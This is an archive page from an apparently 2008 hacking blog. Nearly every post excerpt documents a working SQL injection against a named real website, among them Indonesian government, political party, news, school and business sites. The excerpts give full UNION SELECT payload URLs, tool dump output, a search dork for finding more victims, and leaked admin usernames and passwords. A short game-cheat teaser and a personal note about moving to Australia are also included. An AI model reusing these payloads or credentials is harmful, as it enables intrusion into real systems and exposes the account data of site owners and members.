Tired of waiting your paw points & coins increased. Go see the videos and rage!!!Hack Coins VideoNote:the code is: 840FFF85C12A0FF21st of all...tick all the boxes that is told u to do2nd sell or buy anything *before us start the first scan*and then do exactly what in the video Download Cheat Engine: hereHack Paw Points VideoNote:u can both hack ur paw points and ur trophies....u can also do it...
Wednesday, December 10, 2008
Monday, November 24, 2008
[SQLi] http://www.grouply.com
Intro: it's like the http://www.faniq.com case, i'm tired being invited to join some sites that are not even useful for me :) I decided to check, and again, voila, it's vulnerable :)PoC: http://www.grouply.com/register.php?rem=[SQLi]Demo: http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3/*Database info:[+] URL:http://www.grouply.com/register.php?rem=25271879'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,sqli,3/*[+]...
Sunday, November 23, 2008
[SQLi] http://www.faniq.com
Intro: it was funny. I found this vulnerability when i was about to unsubscribe, and voila, it was vulnerable. The password is not encrypted, so there is a chance that we can access members' email that has the password as they entered when they were registering.PoC : http://www.faniq.com/unsubscribe.php?invite_id=[SQLi]Demo:...
Saturday, November 22, 2008
[SQLi] http://www.broadsword.com.au
Tools: schemafuzz.pyDatabase info: [+] URL: http://www.broadsword.com.au/news.php?id=35+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6--[+] Evasion Used: "+" "--"[+] 20:20:43[-] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: broadsword User: broadsword@localhost Version: 4.1.22[+] Dumping data from database "broadsword" Table "users"[+] and Column(s) ['email', 'password'][+] Number...
[SQLi] http://www.highperformancesailing.com.au
Tools = schemafuzz.pyAdmin page = http://www.highperformancesailing.com.au/admin/Admin usr/pwd = admin:adminDatabase info:[+] URL:http://www.highperformancesailing.com.au/news.php?id=31+AND+1=2+UNION+SELECT+0,sqli,2,3--[+] Evasion Used: "+" "--"[+] 19:12:04[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: sailing_hps User: sailing_sailing@localhost Version: 5.0.51a-community[Database]:...
[SQLi] http://www.westcare.com.au
Tools: schemafuzz.pyAdmin page: http://www.westcare.com.au/admin/[+] URL:http://www.westcare.com.au/news.php?id=26+AND+1=2+UNION+SELECT+sqli,1--[+] Evasion Used: "+" "--"[+] 18:49:07[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: westcare_cms User: westcare_cmsuser@localhost...
[SQLi] BigKid Designs Websites
Dork = inurl:news.php?p=shwPoC = http://www.site.com/news.php?p=shw&id=[SQLi]Demo = http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8--Database structure:[+] URL:http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,unhex(hex(sqli)),4,5,6,7,8--[+] Evasion Used: "+" "--"[+] 18:08:49[+] Proxy Not Given[+] Gathering MySQL...
Friday, November 21, 2008
[SQLi] http://www.imigrasi.co.id
PoC: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=[SQli]Demo: http://www.imigrasi.go.id/index.php?go=pelayanan&pelIdnya=1+and+1=2+union+select+1,2,concat_ws(0x3a,usrID,usrPwd),4,5,6,7,8+from+users+limit+0,1--Tools: RainbowCrack at irc.plain-text.infoAdmin usr/pwd: admin:123qweasdzxcAdmin...
Sunday, November 16, 2008
[SQLi] http://www.dotaportal.com
PoC: http://www.dotaportal.com/index.php?act=items&id=[SQLi]Demo: http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7/*Database info:[+] URL:http://www.dotaportal.com/index.php?act=items&id=151'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3,4,5,6,7/*[+] Evasion Used: "/**/" "/*"[+] 10:40:26[+] Proxy Not Given[+] Gathering MySQL Server...
Friday, November 14, 2008
[SQLi] http://www.bbpk.go.id
PoC: http://www.bbpk.go.id/main/?option=com_other&tbl=1&id=[SQLi]Demo: http://www.bbpk.go.id/main/?option=com_other&tbl=1&id=5+AND+1=2+UNION+SELECT+group_concat(username,0x3a,password,0xd),1+from+mos_users--"Problem: can't decrypt passw...
[SQLi] http://www.gunungkidulkab.go.id
Tool: schemafuzz.py v5.0Admin login loc: http://www.gunungkidulkab.go.id/gerbangkabupaten.phpProblem: can't login?[+] URL:http://www.gunungkidulkab.go.id/home.php?mode=content&id=177+AND+1=2+UNION+SELECT+0,1,2,3,4,sqli,6,7,8,9,10,11,12,13--[+] Evasion Used: "+" "--"[+] 13:17:12[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: dbportalgunungkidul User: gunungkidulkab.g@localhost...
Monday, November 10, 2008
[SQLi] http://www.sulut.go.id
Problem: Admin directory found, but it's forbidden...Admin dir: http://www.sulut.go.id/admin/Dump:[+] URL:http://www.sulut.go.id/new/isi.php?vd=berita&id=89'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7/*[+] Evasion Used: "/**/" "/*"[+] 16:48:27[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: sulut User: sulut@localhost Version: 5.0.27[+] Showing all databases...
Wednesday, October 29, 2008
[SQLi] http://seaedunet.seamolec.org
Tool: schemafuzz.py v5.0[+] URL:http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,sqli,2,3,4--[+] Evasion Used: "+" "--"[+] 17:19:39[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: seaedunet_db User: seaedunet@localhost Version: 5.0.32-Debian_7etch6-log[+] Do we have Access to MySQL Database: Yes <-- w00t w00t[!] http://seaedunet.seamolec.org/main.php?isi=newsdetail&&id=78+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4+FROM+mysql.user--[+]...
Monday, October 27, 2008
Here in Australia...
Wow man, everyday is a busy day. Moving to another country is not an easy task for me. With an "unhuman" weather, i've already got sicked these days, sore throat and runny nose.So, here in Australia, I can easily do hacking stuff like in Indonesia. I try to "play safe" and not ruin my permit to study here. In here, I can't download as much as i did in Indonesia (poor me). I think Indonesia is better...
Wednesday, October 15, 2008
[SQLi] http://sman1-boyolali.com
Tool --> schemafuzz.py v5.0Admin login page --> http://sman1-boyolali.com/admin/Admin usr:pwd --> admin:mastar1234Dump:[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--[+] Evasion Used: "+" "--"[+] 12:40:16[+] Proxy Not Given[+] Gathering MySQL...
[SQLi] http://www.buturnews.idrap.or.id
Tool --> blindext.py v5.0User login --> buturnews:banda1302 (see else in dump)Dump:[+] URL:http://www.buturnews.idrap.or.id/detailBerita.php?ID=62[+] Proxy Not Given[+] Gathering MySQL Server Configuration... [+] MySQL >= v5.0.0 found![+] Showing Tables from database "t79166_dbbutur"[+] 10:12:30[+]...
[SQLi] http://www.jiwasraya.co.id
Admin login page --> http://www.jiwasraya.co.id/admin/Admin usr:pwd --> admin:ari1007 (see else in dump)Dump:[+] URL:http://www.jiwasraya.co.id/detailberita.php?id=233+AND+1=2+UNION+SELECT+sqli--[+] Evasion Used: "+" "--"[+] 09:51:11[+] Proxy Not Given[+] Gathering MySQL Server Configuration......
[SQLi] http://mobile.kompas.com
I try to get the full schema of kompas.com but i'm too tired, and it's too many. If you're so eager to "hack", try to get them all :)Info:[+] URL:http://mobile.kompas.com/?go=p&pid=1&idm=8'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,sqli,2,3/*[+] Evasion Used: "/**/" "/*"[+] 17:59:19[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: kompasmobile User: megadb@10.50.12.196 Version:...
Tuesday, October 14, 2008
[SQLi] http://www.gontha.com/
Tool --> schemafuzz.py v5.0Admin login page --> http://www.gontha.com/admin/Admin usr:pwd --> sai:saimanDump:[+] URL:http://www.gontha.com/photo.php?action=detail&mode=viewphoto&cid=24&idalbum=13+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--[+] Evasion Used: "+" "--"[+] 18:57:14[+]...
[SQLi] http://golkar.go.id
Tool --> schemafuzz v5.0Dump:[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--[+] Evasion Used: "+" "--"[+] 13:14:02[+] Proxy Not Given[+] Gathering MySQL Server Configuration... Database: golkar_pusat User: golkar_pusat@202.43.163.198 Version: 5.0.51a-3ubuntu5.1[+] Do we have Access to MySQL Database: Yes <-- w00t w00t[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,concat(user,0x3a,password),3+FROM+mysql.user--[+]...
[SQLi] http://en.agrimedia.com/
Tool --> schemafuzz.py v5.0Admin login page --> http://en.agrimedia.com/admin/Admin usr:login --> admin:agri8z3 (see else in dump)Dump:[+] URL:http://en.agrimedia.com/libfeed/shop/detail.php?id=246'/**/AND/**/1=2/**/UNION/**/SELECT/**/sqli,1,2,3,4,5,6,7,8,9,10,11,12,13/*[+] Evasion Used: "/**/"...